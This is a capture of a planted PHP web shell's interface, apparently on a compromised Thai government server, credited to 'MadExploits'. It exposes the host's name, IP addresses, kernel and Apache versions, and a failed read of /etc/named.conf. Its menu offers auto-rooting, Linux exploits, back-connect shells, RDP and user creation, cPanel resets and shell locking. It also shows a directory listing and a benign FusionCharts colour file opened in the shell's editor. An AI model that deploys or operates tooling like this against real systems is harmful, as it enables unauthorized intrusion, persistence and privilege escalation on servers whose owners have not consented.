Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
FusionCharts /
[ HOME SHELL ]
Name
Size
Permission
Action
FCF_Area2D.swf
19.32
KB
-rwxr-xr-x
FCF_Bar2D.swf
18.96
KB
-rwxr-xr-x
FCF_Candlestick.swf
18.58
KB
-rwxr-xr-x
FCF_Column2D.swf
18.94
KB
-rwxr-xr-x
FCF_Column3D.swf
20.54
KB
-rwxr-xr-x
FCF_Doughnut2D.swf
16.43
KB
-rwxr-xr-x
FCF_Funnel.swf
12.6
KB
-rwxr-xr-x
FCF_Gantt.swf
26.7
KB
-rwxr-xr-x
FCF_Line.swf
19.47
KB
-rwxr-xr-x
FCF_MSArea2D.swf
20.33
KB
-rwxr-xr-x
FCF_MSBar2D.swf
19.97
KB
-rwxr-xr-x
FCF_MSColumn2D.swf
20
KB
-rwxr-xr-x
FCF_MSColumn2DLineDY.swf
22.43
KB
-rwxr-xr-x
FCF_MSColumn3D.swf
21.62
KB
-rwxr-xr-x
FCF_MSColumn3DLineDY.swf
23.64
KB
-rwxr-xr-x
FCF_MSLine.swf
20.99
KB
-rwxr-xr-x
FCF_Pie2D.swf
16.64
KB
-rwxr-xr-x
FCF_Pie3D.swf
10.06
KB
-rwxr-xr-x
FCF_StackedArea2D.swf
21
KB
-rwxr-xr-x
FCF_StackedBar2D.swf
20.61
KB
-rwxr-xr-x
FCF_StackedColumn2D.swf
20.23
KB
-rwxr-xr-x
FCF_StackedColumn3D.swf
21.6
KB
-rwxr-xr-x
FC_Colors.php
1.56
KB
-rwxr-xr-x
FusionCharts.js
13.51
KB
-rwxr-xr-x
FusionCharts.php
7.48
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : FC_Colors.php
<?php //This page contains an array of colors to be used as default set of colors for FusionCharts //arr_FCColors is the array that would contain the hex code of colors //ALL COLORS HEX CODES TO BE USED WITHOUT # //We also initiate a counter variable to help us cyclically rotate through //the array of colors. $FC_ColorCounter=0; $arr_FCColors[0] = "1941A5" ;//Dark Blue $arr_FCColors[1] = "AFD8F8"; $arr_FCColors[2] = "F6BD0F"; $arr_FCColors[3] = "8BBA00"; $arr_FCColors[4] = "A66EDD"; $arr_FCColors[5] = "F984A1" ; $arr_FCColors[6] = "CCCC00" ;//Chrome Yellow+Green $arr_FCColors[7] = "999999" ;//Grey $arr_FCColors[8] = "0099CC" ;//Blue Shade $arr_FCColors[9] = "FF0000" ;//Bright Red $arr_FCColors[10] = "006F00" ;//Dark Green $arr_FCColors[11] = "0099FF"; //Blue (Light) $arr_FCColors[12] = "FF66CC" ;//Dark Pink $arr_FCColors[13] = "669966" ;//Dirty green $arr_FCColors[14] = "7C7CB4" ;//Violet shade of blue $arr_FCColors[15] = "FF9933" ;//Orange $arr_FCColors[16] = "9900FF" ;//Violet $arr_FCColors[17] = "99FFCC" ;//Blue+Green Light $arr_FCColors[18] = "CCCCFF" ;//Light violet $arr_FCColors[19] = "669900" ;//Shade of green //getFCColor method helps return a color from arr_FCColors array. It uses //cyclic iteration to return a color from a given index. The index value is //maintained in FC_ColorCounter function getFCColor() { //accessing the global variables global $FC_ColorCounter; global $arr_FCColors; //Update index $FC_ColorCounter++; //Return color return($arr_FCColors[$FC_ColorCounter % count($arr_FCColors)]); } ?>
Close